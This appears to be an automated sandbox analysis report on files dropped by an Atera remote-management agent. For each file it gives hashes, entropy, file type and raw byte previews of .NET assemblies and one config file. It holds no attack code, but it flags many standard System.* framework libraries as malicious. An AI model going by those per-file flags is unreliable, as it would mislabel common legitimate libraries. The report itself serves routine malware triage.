                                                                                                                                                                                                                                        MD5:A9C325FF89F0446C015F7083D1B7ECA0
                                                                                                                                                                                                                                        SHA1:428A8F4453585CE186DEA6C2DEEAC1061E826695
                                                                                                                                                                                                                                        SHA-256:DFEBA97F1A827853A75ACB8B624B41AB8B7D58DA6C6B9FB486C22B1060B77E59
                                                                                                                                                                                                                                        SHA-512:722D0BAAEB6271B2C52033B9E9B3C1AD56F5C4C0114B20CFEBFDAD386DFBA0FB996E2C2303E4D4891818E0851496322AE4B434D65E9AB2009B508CD3904592E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z............"...0..............;... ...@....@.. .......................`............`..................................;..O....@..@...............0(...@.......:..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......@......................@..B.................;......H.......H$...............................................................0..;.......~....s.....(.....(.~....r...p.o....r...p.o....(....o......*............(......(....*.s.........*.0..x........(......}.....(.....s....}.....s....}....(...+.~....%-.&~..........s....%............s....(.....{....s.......s....}....*.0..5.......(....--(....o......(.......(....+. ....( ....{....,.*....0..I.........i....*..{.......o!.....{.....o...+.. ..{....r!..p.o....(#...o.......*.*............'..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19433
                                                                                                                                                                                                                                        Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                        MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                        SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                        SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                        SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117028686306414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:hZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHP:rgo0WPVTXgv
                                                                                                                                                                                                                                        MD5:9B8D2E7F233C63FF36FD710F108886F9
                                                                                                                                                                                                                                        SHA1:5F62EB11A2D2E3860B46FCA9B933ACB0BC680AF2
                                                                                                                                                                                                                                        SHA-256:39CAEFB40FA5708EFCA73B59BA0211FE7BD0CDEA99EFEA6F39A7AB439B3E9BBD
                                                                                                                                                                                                                                        SHA-512:DD14DDEDDD29752C7DC68BA4E46D91B59E0285B0B6C17AD83887F76B78F5C628E00750592D571973745098B5DC090DAD9379F65BF2238AA211C62F15D8B4FF0D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.807984998521236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:My8+xcexWQFW5QKNyby2sE9jBF6IYiYF8pA5K+oCGUHF1/Juf6FLv:9DNxWQFWHNyb8E9VF6IYinAM+oC5+sj
                                                                                                                                                                                                                                        MD5:8D56D8AB807E2BB053C14AAAAB3F76EC
                                                                                                                                                                                                                                        SHA1:A28A69417FE703805ADA6988786662E74429590D
                                                                                                                                                                                                                                        SHA-256:E4F6CF26C0940CEB1670EA368D61147F2E8EFB28A3D0D536D6D6A3AA38EF6188
                                                                                                                                                                                                                                        SHA-512:42A39A63D8B8386612391C7D2C8321981908E444C45858AEB3E88B24F04FEBF3978A2E615BF92476561CF388EFDF64A4ED9E8FD08B15F07C372C92134EABE19F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ....................................@..................................(..O....@..................0(...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.671215548372165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ArMdp9yXOfPfAxR5zwWvYW8avNyb8E9VF6IYinAM+oCANLSs:ArMcXP6gEpYinAMxCW
                                                                                                                                                                                                                                        MD5:7D7BC54735AA54284BD066195E2EFEEF
                                                                                                                                                                                                                                        SHA1:7D9F694798845C6F953E0BAE47B538FDAABD7326
                                                                                                                                                                                                                                        SHA-256:CBFDFAF72E7059EA889644CA573281290386EDF7FFE8A88F2388384488BC7224
                                                                                                                                                                                                                                        SHA-512:7B00BAF2A970C1393F0178321D5C971780C0559DD74479216B384530FDFF1C595A989DD713416107A21FB0C29AC631865D9CA6F7A527C7CAF6425435C2ED87EA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ....................................@..................................B..O....`..@...............0(...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.906510872301998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ym2igOWnW8rWVNyb8E9VF6IYinAM+oCPT89ZQlxY:It0EpYinAMxCw9Ow
                                                                                                                                                                                                                                        MD5:65D1CD36EDCD1F1DFFAA379D42832990
                                                                                                                                                                                                                                        SHA1:B66CE4DBDB49061FB85AE286E15C2BEDB37B3811
                                                                                                                                                                                                                                        SHA-256:0C980991DFFD32A98E147A77D078FA2B14FDBB6603B9E8C37790524600C50BE5
                                                                                                                                                                                                                                        SHA-512:9D795E6E14474912A88CCF255D131EC17D98D29726884BAE45FA219BA7AE7DACA042824F4A1ED64BFE814E0BBD55BF24CAFAAF93126EBEAAAF16DD3D350A15A5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@.................................t)..O....@..D...............0(...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.900073443661473
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xnapn1iwwPWcGWvTNyb8E9VF6IYinAM+oCagmKRFI:YDu3PEpYinAMxC0y2
                                                                                                                                                                                                                                        MD5:D9939BE65E8FF5F87E71E9F59452FAC4
                                                                                                                                                                                                                                        SHA1:508BC0DDE13B36F92CB6303C87C172862AFF6960
                                                                                                                                                                                                                                        SHA-256:4ED6EA2F3AA44AAB16DAD543693D22373841896081754AF03707A9D856200EE0
                                                                                                                                                                                                                                        SHA-512:10075AE5B07BA4A3DF1DD0D114E8781D9653D4B641824BC8C935B396F1134B880ABE07E6C2AB3D1E90AEF4EDC4AAFA01993FB37D5192D35BFBF90C3AAA5B57B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................7....@.................................p)..O....@..@...............0(...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.906424509107109
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6HLaEav5aaUa6arWVLWwNyb8E9VF6IYinAM+oCg3e0t:LPv5t/NOZEpYinAMxC8N
                                                                                                                                                                                                                                        MD5:DBC78D303DA8000D29B7B88A8DCF5CF0
                                                                                                                                                                                                                                        SHA1:07B9F198C277937087510BCBEC89206ADC95D6BC
                                                                                                                                                                                                                                        SHA-256:7584BF9D6EFF46DAEE3DE8420349978DC01761B0224F7D6320B2FE8C83A37C5E
                                                                                                                                                                                                                                        SHA-512:3B1FFB98C71645E874C5FBEF5C0446B3D3B67E739136FD66ACBDAE637B1CBE69A568E10E8582BEFD160DB0BC83193BB792BD1CC549B747AAEB65EA355F6F9FF5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... .............................. .....@..................................)..O....@..P...............0(...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.75959124456669
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:+6iIJq56dOuWSKeWRNyb8E9VF6IYinAM+oCHDRxQU/AE:IiA1EpYinAMxC9mlE
                                                                                                                                                                                                                                        MD5:7AE89B4919D0841B660685F2CCE99EEB
                                                                                                                                                                                                                                        SHA1:06C67D34A273D87ED4BFBE1E9A40817C208654B5
                                                                                                                                                                                                                                        SHA-256:2D236D6205215562E6A76E6785F6D1A9EFBFE0CC201507A50167227FDABF5298
                                                                                                                                                                                                                                        SHA-512:F876119A4BE8ECE659B9F79FA1E656AABBB16E1A063B1A19C26B36BAA1EC7E9DD094536E96E7DABE198F49CEF0D65A8B309AF52BE32DD83E5A85804C38564E49
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ..............................Q.....@..................................*..O....@..................0(...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.810461358672356
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:snzz+MpSaLWW0+W1Nyb8E9VF6IYinAM+oC1Jj7O:6puxEpYinAMxC7nO
                                                                                                                                                                                                                                        MD5:F0E5263E8A8EC9161280763374DF2C93
                                                                                                                                                                                                                                        SHA1:19B3E6289E5C6224601CD6BB03314AEEFE3D65C7
                                                                                                                                                                                                                                        SHA-256:CEAA5DE0AD181E49D6F94E5C7BFA631090E433BA3C75A8035FD19A887090B2BB
                                                                                                                                                                                                                                        SHA-512:C0D7E2938EBC1F514E7030F2FE05B274B80CB277F5C7F1FBA8E27E693B8F6FEE6F5AA4E28D120550387D2756C61DEC66EBDA7C139559CFE7D2C0A96BA2C83535
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ...............................^....@..................................)..O....@..................0(...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.858702500937733
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lGhr+YUfyHxsW/HWZNyb8E9VF6IYinAM+oCVUwG:akmoEpYinAMxCq
                                                                                                                                                                                                                                        MD5:125C877CC35052C738CB6BDA6C0B9C31
                                                                                                                                                                                                                                        SHA1:2E1E68C81E5FE10DDC12624F6D5DCAA31DED5D23
                                                                                                                                                                                                                                        SHA-256:1AAE3F8E3355E6F65DA3312C08212462A35C43D2E6787C7FA6CBF2124E6608D2
                                                                                                                                                                                                                                        SHA-512:351024BBD05E90ADE87B4BA6401C759D480B5FFF1346C1DDBE7D2C7FAFCACD13467F10542392D81BC7C22E76869FAB2B513E60A16D0EBD7B9190A71C1B6187EC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ....................................@.................................<+..O....@..`...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.791464340264074
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6RE+ruiA5vzWeNWkNyb8E9VF6IYinAM+oC4XH9:6S9bXEpYinAMxCYd
                                                                                                                                                                                                                                        MD5:75788E5648BE0DAEDF00FBDDD64CCFBC
                                                                                                                                                                                                                                        SHA1:A259734F72C966D7851D0AC4F13054F2F65E3C7E
                                                                                                                                                                                                                                        SHA-256:CF76081568317EF7B6684757A79CD311C4437F5C8A4D375491A0B42637D795D1
                                                                                                                                                                                                                                        SHA-512:8ABD3EE375B5BBA447CDED68DE8FE35A305BB6A1CCA8143CA0C5415AD968A3FA4939638F201762CCCBF1CC4932892E74CDDD04DC890EEF25402DC3668F984888
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ....................................@................................../..O....@..p...............0(...`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.852002078673193
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rT+6ywnVvW0LWoNyb8E9VF6IYinAM+oCcu6Pw:r99tEpYinAMxCD
                                                                                                                                                                                                                                        MD5:CDA30CFA16AECFAB920EF4F7607A703C
                                                                                                                                                                                                                                        SHA1:8AAA41044D80B577F87E83A6D80B243EAF07C1D8
                                                                                                                                                                                                                                        SHA-256:B8F7461421716C7D235BB8595C4A50B632218B54DAB78476005458B065F11B3F
                                                                                                                                                                                                                                        SHA-512:445962C0D27CE9D2F189A5EDA3A1D2106542433DC80CD1EFD9E780761AEFAFB7C9FBF5E5097AAA18C91C06BCDF9CE593C642EB949B775A69A74F4A2F09B7C3D4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................p.....@..................................(..O....@..................0(...`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.849726398461054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:XRbzriaXT+WlEWENyb8E9VF6IYinAM+oCri+tJRD:B7icWEpYinAMxCu87D
                                                                                                                                                                                                                                        MD5:F97C039A3E96C77AC1A630EC88882FFB
                                                                                                                                                                                                                                        SHA1:999D4A9AA0F5F3296F4E3928007BB8DA9EC265D6
                                                                                                                                                                                                                                        SHA-256:BC74D51552697CEB7FD7965968F1747A5788F1B074B3370F5A555DAF97FA858F
                                                                                                                                                                                                                                        SHA-512:EC271F5672C75FA186E213160DDB7950A02F643E3817232E8F4E4123D4BF4EB1D03F67290A66BDCE54949AF8B34BE31437E16E8125A6BEFCDB42DB057C7FD47A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ...................................@..................................(..O....@..................0(...`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148528
                                                                                                                                                                                                                                        Entropy (8bit):5.418393253179765
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:5HOdYYWg+GImdMEGK61wb5nx03LBblQ6Ndk66byYSI4Zki+BReD4pK/uYxtl+97r:0dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+9/
                                                                                                                                                                                                                                        MD5:13C67BC8DC75E286564EEE86EEDB79E3
                                                                                                                                                                                                                                        SHA1:5E243FB69165BCA0873F3F6363D99D580962D334
                                                                                                                                                                                                                                        SHA-256:A1820496128C7FBD77F01C3FC7BACEEE764123FF24FD700BDE3D466F99235649
                                                                                                                                                                                                                                        SHA-512:440B799AA99F89C8B982D2A2122F1FF9F33AB696D0F8BB6BF7735052205A60604EDF98A4FF421B77A5BE565040A0E31D9540B67EB6A336F6B1EBDECFA55F81E9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
